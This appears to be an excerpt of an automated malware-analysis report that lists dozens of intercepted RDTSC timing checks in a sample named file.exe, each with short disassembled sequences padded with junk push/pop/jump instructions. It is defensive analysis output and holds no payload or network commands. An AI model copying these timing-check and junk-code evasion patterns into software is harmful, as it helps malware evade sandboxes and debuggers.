                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110CCAF second address: 110CCD4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007FC408FC8B06h 0x00000010 jmp 00007FC408FC8B15h 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B714 second address: 110B718 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B718 second address: 110B73B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC408FC8B12h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FC408FC8B0Bh 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B73B second address: 110B773 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC7027h 0x00000007 js 00007FC408FC701Eh 0x0000000d push eax 0x0000000e pop eax 0x0000000f jng 00007FC408FC7016h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a js 00007FC408FC7016h 0x00000020 jnl 00007FC408FC7016h 0x00000026 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B773 second address: 110B779 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B8CA second address: 110B8D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B8D0 second address: 110B8F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 jnc 00007FC408FC8B06h 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 pushad 0x00000013 js 00007FC408FC8B06h 0x00000019 pushad 0x0000001a popad 0x0000001b ja 00007FC408FC8B06h 0x00000021 push edi 0x00000022 pop edi 0x00000023 popad 0x00000024 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110BA5F second address: 110BA9B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC408FC7029h 0x0000000a pop esi 0x0000000b jmp 00007FC408FC701Eh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push esi 0x00000016 pop esi 0x00000017 jbe 00007FC408FC7016h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110BA9B second address: 110BAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC408FC8B0Fh 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110CA34 second address: 110CA54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC408FC7025h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11106EB second address: 11106F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11106F1 second address: 11106F9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11106F9 second address: 1110716 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC408FC8B1Fh 0x00000008 jmp 00007FC408FC8B13h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1110297 second address: 11102B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC7021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007FC408FC701Eh 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11146C9 second address: 11146CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112DB9B second address: 112DBAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007FC408FC7016h 0x0000000d jl 00007FC408FC7016h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112DA36 second address: 112DA45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jng 00007FC408FC8B06h 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112F85C second address: 112F879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC408FC7026h 0x0000000b popad 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112F879 second address: 112F89B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FC408FC8B0Ch 0x00000008 pop ecx 0x00000009 pushad 0x0000000a jmp 00007FC408FC8B0Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114992B second address: 114992F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1148922 second address: 114893F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FC408FC8B13h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114893F second address: 114894C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FC408FC701Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1148A99 second address: 1148AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC408FC8B06h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jl 00007FC408FC8B06h 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1148AAE second address: 1148AD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC7028h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1148D45 second address: 1148D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC408FC8B06h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f ja 00007FC408FC8B06h 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1148D5A second address: 1148D5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1149011 second address: 1149045 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FC408FC8B16h 0x0000000f pushad 0x00000010 jmp 00007FC408FC8B0Ah 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1149045 second address: 114904B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11495FC second address: 1149600 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1149600 second address: 114962B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC408FC7016h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007FC408FC7028h 0x00000014 pop ebx 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114B25F second address: 114B284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jc 00007FC408FC8B12h 0x0000000d jbe 00007FC408FC8B06h 0x00000013 jl 00007FC408FC8B06h 0x00000019 popad 0x0000001a push esi 0x0000001b push eax 0x0000001c push edx 0x0000001d jg 00007FC408FC8B06h 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114B284 second address: 114B28E instructions: 0x00000000 rdtsc 0x00000002 js 00007FC408FC7016h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114B28E second address: 114B298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114DBE7 second address: 114DBF1 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC408FC7016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114DDB1 second address: 114DDB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114DECE second address: 114DEDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114DEDE second address: 114DEF3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007FC408FC8B06h 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114DEF3 second address: 114DEF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114DEF7 second address: 114DF13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC408FC8B11h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115114D second address: 1151155 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1151155 second address: 115115D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115115D second address: 1151161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1150D03 second address: 1150D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1150D07 second address: 1150D0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1150D0B second address: 1150D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50000FD second address: 500011A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC7029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 500011A second address: 5000158 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 3BD2h 0x00000007 push edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esp 0x0000000d pushad 0x0000000e mov cx, D7F7h 0x00000012 pushfd 0x00000013 jmp 00007FC408FC8B0Ch 0x00000018 add esi, 11061DE8h 0x0000001e jmp 00007FC408FC8B0Bh 0x00000023 popfd 0x00000024 popad 0x00000025 mov dword ptr [esp], ebp 0x00000028 pushad 0x00000029 mov esi, 48C32CFBh 0x0000002e push ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0DF2 second address: 4FE0DF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0DF6 second address: 4FE0DFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0DFA second address: 4FE0E00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0E00 second address: 4FE0E49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007FC408FC8B11h 0x00000010 mov di, cx 0x00000013 pop eax 0x00000014 call 00007FC408FC8B0Dh 0x00000019 mov esi, 199657A7h 0x0000001e pop esi 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0E49 second address: 4FE0E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC408FC7022h 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0E60 second address: 4FE0ED2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov ebx, 35D68338h 0x00000011 pushfd 0x00000012 jmp 00007FC408FC8B11h 0x00000017 xor cl, 00000026h 0x0000001a jmp 00007FC408FC8B11h 0x0000001f popfd 0x00000020 popad 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FC408FC8B13h 0x0000002b add eax, 78482E5Eh 0x00000031 jmp 00007FC408FC8B19h 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0ED2 second address: 4FE0EE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC408FC7023h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030541 second address: 5030583 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC408FC8B11h 0x00000009 add eax, 251060A6h 0x0000000f jmp 00007FC408FC8B11h 0x00000014 popfd 0x00000015 mov si, 5BD7h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e push eax 0x0000001f mov cx, dx 0x00000022 pop ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 mov eax, 1FDD461Dh 0x0000002a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030583 second address: 50305BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC701Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC408FC7021h 0x00000012 and si, 2366h 0x00000017 jmp 00007FC408FC7021h 0x0000001c popfd 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50305BF second address: 50305DE instructions: 0x00000000 rdtsc 0x00000002 mov edi, 46354DF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC408FC8B12h 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50305DE second address: 50305F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC408FC701Eh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50305F0 second address: 5030620 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FC408FC8B16h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030620 second address: 5030626 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030626 second address: 503062C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0125 second address: 4FC0129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0129 second address: 4FC012D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC012D second address: 4FC0133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0133 second address: 4FC0200 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007FC408FC8B10h 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 jmp 00007FC408FC8B0Eh 0x00000019 pushfd 0x0000001a jmp 00007FC408FC8B12h 0x0000001f sbb si, CD48h 0x00000024 jmp 00007FC408FC8B0Bh 0x00000029 popfd 0x0000002a popad 0x0000002b push dword ptr [ebp+04h] 0x0000002e jmp 00007FC408FC8B16h 0x00000033 push dword ptr [ebp+0Ch] 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007FC408FC8B0Eh 0x0000003d adc ecx, 6B0C32D8h 0x00000043 jmp 00007FC408FC8B0Bh 0x00000048 popfd 0x00000049 push eax 0x0000004a push edx 0x0000004b pushfd 0x0000004c jmp 00007FC408FC8B16h 0x00000051 sbb cx, FD38h 0x00000056 jmp 00007FC408FC8B0Bh 0x0000005b popfd 0x0000005c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0B86 second address: 4FE0BE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 675CFD94h 0x00000008 movsx edi, si 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 call 00007FC408FC7022h 0x00000015 pushfd 0x00000016 jmp 00007FC408FC7022h 0x0000001b xor esi, 109D7878h 0x00000021 jmp 00007FC408FC701Bh 0x00000026 popfd 0x00000027 pop ecx 0x00000028 mov ax, bx 0x0000002b popad 0x0000002c mov ebp, esp 0x0000002e jmp 00007FC408FC701Bh 0x00000033 pop ebp 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0BE6 second address: 4FE0BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0BEA second address: 4FE0BF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE068F second address: 4FE06DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FC408FC8B10h 0x0000000c jmp 00007FC408FC8B15h 0x00000011 popfd 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007FC408FC8B11h 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d movsx edx, si 0x00000020 mov esi, 322C59DBh 0x00000025 popad 0x00000026 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE06DC second address: 4FE0732 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC408FC7027h 0x00000008 movzx eax, di 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 jmp 00007FC408FC7021h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushfd 0x00000019 jmp 00007FC408FC701Eh 0x0000001e sub si, 1138h 0x00000023 jmp 00007FC408FC701Bh 0x00000028 popfd 0x00000029 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0732 second address: 4FE0741 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0741 second address: 4FE0745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0745 second address: 4FE074B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0612 second address: 4FE063C instructions: 0x00000000 rdtsc 0x00000002 call 00007FC408FC7022h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007FC408FC701Ah 0x00000014 pop ecx 0x00000015 mov ecx, ebx 0x00000017 popad 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0371 second address: 4FE0389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC408FC8B14h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0389 second address: 4FE03B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC701Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC408FC7025h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0300 second address: 4FF031E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov di, C46Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC408FC8B11h 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF031E second address: 4FF036A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 32ED32D2h 0x00000008 pushfd 0x00000009 jmp 00007FC408FC7023h 0x0000000e or ch, FFFFFFCEh 0x00000011 jmp 00007FC408FC7029h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FC408FC701Dh 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF036A second address: 4FF037A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC408FC8B0Ch 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5000462 second address: 5000493 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC7029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov di, ax 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC408FC701Bh 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5000493 second address: 50004C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC408FC8B0Dh 0x00000011 rdtsc
